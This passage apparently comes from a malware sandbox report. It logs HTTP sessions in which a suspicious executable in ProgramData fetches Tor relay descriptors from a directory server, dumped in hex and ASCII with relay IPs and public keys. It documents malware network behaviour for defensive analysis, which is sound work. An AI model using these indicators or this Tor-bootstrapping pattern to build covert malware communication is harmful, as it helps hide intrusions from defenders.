70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          14192.168.2.349711151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:44.760047913 CET2702OUTGET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:44.811206102 CET2704INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:44 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:44 GMT
                          Data Raw: 72 6f 75 74 65 72 20 6f 6e 69 6f 6e 44 41 4f 72 65 6c 30 61 64 65 64 31 20 35 2e 32 2e 37 39 2e 31 39 30 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 74 41 5a 7a 70 74 41 56 55 39 5a 46 59 38 55 37 64 6e 6a 70 51 52 55 6d 73 47 42 7a 44 56 69 46 2b 79 64 6b 42 58 74 6a 51 52 4e 2f 6b 41 51 41 67 42 41 44 55 75 45 66 41 0a 42 5a 4f 6a 31 6c 65 6c 33 7a 42 72 50 64 74 76 66 72 45 59 32 51 77 6d 56 31 63 34 48 6b 42 56 6f 68 68 54 33 74 68 56 65 31 69 68 59 59 79 64 79 61 72 44 73 31 42 79 54 52 74 63 74 75 38 73 0a 43 69 59 6b 6c 43 52 33 63 4c 48 46 37 6c 44 34 6d 31 6e 6c 4e 70 45 30 7a 6d 78 6b 76 38 48 45 4a 4e 46 6d 32 56 6f 77 74 43 59 69 32 78 67 47 50 4a 6b 70 73 39 69 58 49 41 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 31 4c 68 48 77 41 57 54 6f 39 5a 58 70 64 38 77 61 7a 33 62 62 33 36 78 47 4e 6b 4d 4a 6c 64 58 4f 42 35 41 56 61 49 59 55 39 34 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 30 3a 32 32 3a 34 33 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 41 38 20 43 43 42 31 20 46 42 37 30 20 39 38 34 32 20 32 36 32 33 20 31 32 38 33 20 35 39 36 44 20 41 37 33 34 20 41 38 30 45 20 33 46 36 46 0a 75 70 74 69 6d 65 20 32 34 30 31 32 31 34 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 33 33 30 38 36 37 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 33 39 33 31 35 37 36 38 39 34 32 36 30 32 43 37 43 34 36 33 34 46 41 30 43 39 33 44 32 43 39 35 30 41 39 45 44 38 30 38 20 6e 33 38 6a 72 6a 50 66 35 48 38 67 6c 64 4e 46 66 72 2b 41 75 34 4e 7a 33 65 33 36 32 55 74 42 63 4a 50 7a 6e 4c 43 56 76 73 49 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 68 64 30 51 51 51 36 53 61 57 52 6b 4f 6f 52 76 35 76 54 45 68 2b 4f 63 73 36 4d 75 67 4b 58 59 75 68 69 70 70 77 39 64 76 74 48 7a 46 6f 2b 43 73 6e 67 38 36 4e 0a 78 62 6c 6c 77 45 4a 65 39 2b 71 4f 55 44 2b 56 43 39 2b 67 79 7a 6c 2b 71 44 79 6e 6e 51 33 38 77 71 31 66 4e 6a 48 54 36 36 64 63 51 4e 68 57 54 76 78 38 54 30 66 42 53 44 75 6e 73 64 2f 32 0a 2b 45 35 75 41 72 64 48 33 53 6f 37 56 52 48 56 65 58 2b 57 58 71 47 56 64 69 57 64 46 76 43 4e 76 4d 42 6e 6d 5a 54 50 72 72 36 75 37 4a 39 53 37 51 35 50 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 38 48
                          Data Ascii: router onionDAOrel0aded1 5.2.79.190 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxVtAZzptAVU9ZFY8U7dnjpQRUmsGBzDViF+ydkBXtjQRN/kAQAgBADUuEfABZOj1lel3zBrPdtvfrEY2QwmV1c4HkBVohhT3thVe1ihYYydyarDs1ByTRtctu8sCiYklCR3cLHF7lD4m1nlNpE0zmxkv8HEJNFm2VowtCYi2xgGPJkps9iXIA4=-----END ED25519 CERT-----master-key-ed25519 1LhHwAWTo9ZXpd8waz3bb36xGNkMJldXOB5AVaIYU94platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 00:22:43fingerprint 02A8 CCB1 FB70 9842 2623 1283 596D A734 A80E 3F6Fuptime 2401214bandwidth 1073741824 1073741824 2330867extra-info-digest 39315768942602C7C4634FA0C93D2C950A9ED808 n38jrjPf5H8gldNFfr+Au4Nz3e362UtBcJPznLCVvsIonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKhd0QQQ6SaWRkOoRv5vTEh+Ocs6MugKXYuhippw9dvtHzFo+Csng86NxbllwEJe9+qOUD+VC9+gyzl+qDynnQ38wq1fNjHT66dcQNhWTvx8T0fBSDunsd/2+E5uArdH3So7VRHVeX+WXqGVdiWdFvCNvMBnmZTPrr6u7J9S7Q5PAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL8H


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          15192.168.2.349712151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:46.440762997 CET2712OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:46.489398956 CET2713INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:46 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:46 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          16192.168.2.349713151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:46.863758087 CET2716OUTGET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:46.905436039 CET2718INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:46 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:46 GMT
                          Data Raw: 72 6f 75 74 65 72 20 30 78 36 37 37 32 36 35 37 39 20 38 39 2e 35 38 2e 36 30 2e 32 30 38 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 61 45 41 62 44 46 54 42 6c 38 6a 66 42 77 56 44 37 65 38 74 51 4e 6c 4a 68 56 53 48 44 51 43 43 75 71 79 78 31 2f 7a 66 4b 55 6b 6c 67 59 41 51 41 67 42 41 44 57 4c 54 30 59 0a 50 46 35 65 64 59 36 53 76 55 62 69 71 70 47 4a 75 67 55 6e 4e 71 68 48 32 73 69 2b 31 2f 67 46 61 57 58 66 30 4a 66 59 42 6d 4b 42 49 52 57 70 78 4b 62 44 4e 42 44 39 58 39 5a 6d 61 62 43 6f 0a 76 61 49 77 50 71 6a 39 57 56 35 57 2f 4d 66 43 77 34 71 6d 70 64 58 72 5a 75 77 5a 46 34 4d 48 53 6e 78 68 6e 4e 57 6d 57 46 6a 31 2f 4c 30 68 48 74 6e 7a 52 6b 63 67 46 77 73 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 31 69 30 39 47 44 78 65 58 6e 57 4f 6b 72 31 47 34 71 71 52 69 62 6f 46 4a 7a 61 6f 52 39 72 49 76 74 66 34 42 57 6c 6c 33 39 41 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 61 3a 34 63 63 30 3a 31 3a 32 65 38 3a 34 33 30 3a 64 30 66 66 3a 66 65 31 36 3a 61 66 34 66 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 32 3a 31 30 3a 31 39 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 42 32 20 31 35 32 31 20 32 39 36 38 20 36 41 45 30 20 42 45 30 35 20 46 33 44 31 20 34 36 30 35 20 39 31 44 44 20 37 31 43 34 20 42 42 31 35 0a 75 70 74 69 6d 65 20 36 34 38 32 30 37 0a 62 61 6e 64 77 69 64 74 68 20 31 32 35 38 32 39 31 32 20 31 36 37 37 37 32 31 36 20 31 32 36 33 32 39 32 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 44 41 44 39 38 34 31 36 46 42 36 38 37 37 34 45 30 30 35 39 44 42 39 32 42 35 35 43 41 37 43 34 42 41 36 45 42 42 37 20 67 42 76 58 68 30 4f 62 74 6b 41 33 6a 6b 6e 4b 49 7a 59 46 6a 5a 4e 4b 46 67 65 62 56 4b 49 63 4a 75 76 38 4a 70 32 50 7a 6e 73 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4f 44 4f 36 47 34 39 33 44 44 6a 2f 36 4a 6d 52 76 33 6b 38 2f 61 51 68 57 42 72 72 73 6d 51 4c 51 64 52 56 67 35 73 33 44 6a 61 6d 55 51 41 4d 4f 64 48 41 61 63 41 0a 55 73 63 57 46 4a 56 47 2f 4c 69 61 4b 57 66 45 65 42 59 6b 42 65 54 35 45 49 70 76 50 49 32 31 55 2f 4d 42 55 53 45 4c 57 74 51 68 6a 57 56 6b 45 73 71 4a 5a 32 52 48 63 77 50 44 51 76 6e 76 0a 6e 4b 37 46 31 7a 43 61 6c 38 75 64 4b 50 6e 34 39 61 56 61 33 72 56 43 30 4c 50 32 4d 53 57 46 66 66 74 63 2f 53 71 42 35 54 36 64 7a 4d 73 41 51 6a 38 4a 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79
                          Data Ascii: router 0x67726579 89.58.60.208 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxaEAbDFTBl8jfBwVD7e8tQNlJhVSHDQCCuqyx1/zfKUklgYAQAgBADWLT0YPF5edY6SvUbiqpGJugUnNqhH2si+1/gFaWXf0JfYBmKBIRWpxKbDNBD9X9ZmabCovaIwPqj9WV5W/MfCw4qmpdXrZuwZF4MHSnxhnNWmWFj1/L0hHtnzRkcgFws=-----END ED25519 CERT-----master-key-ed25519 1i09GDxeXnWOkr1G4qqRiboFJzaoR9rIvtf4BWll39Aor-address [2a0a:4cc0:1:2e8:430:d0ff:fe16:af4f]:9001platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 02:10:19fingerprint 02B2 1521 2968 6AE0 BE05 F3D1 4605 91DD 71C4 BB15uptime 648207bandwidth 12582912 16777216 12632922extra-info-digest FDAD98416FB68774E0059DB92B55CA7C4BA6EBB7 gBvXh0ObtkA3jknKIzYFjZNKFgebVKIcJuv8Jp2Pznsonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAODO6G493DDj/6JmRv3k8/aQhWBrrsmQLQdRVg5s3DjamUQAMOdHAacAUscWFJVG/LiaKWfEeBYkBeT5EIpvPI21U/MBUSELWtQhjWVkEsqJZ2RHcwPDQvnvnK7F1zCal8udKPn49aVa3rVC0LP2MSWFfftc/SqB5T6dzMsAQj8JAgMBAAE=-----END RSA PUBLIC KEY-----signing-key


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          17192.168.2.349714151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:48.993066072 CET2725OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:49.043047905 CET2726INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:49 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:49 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 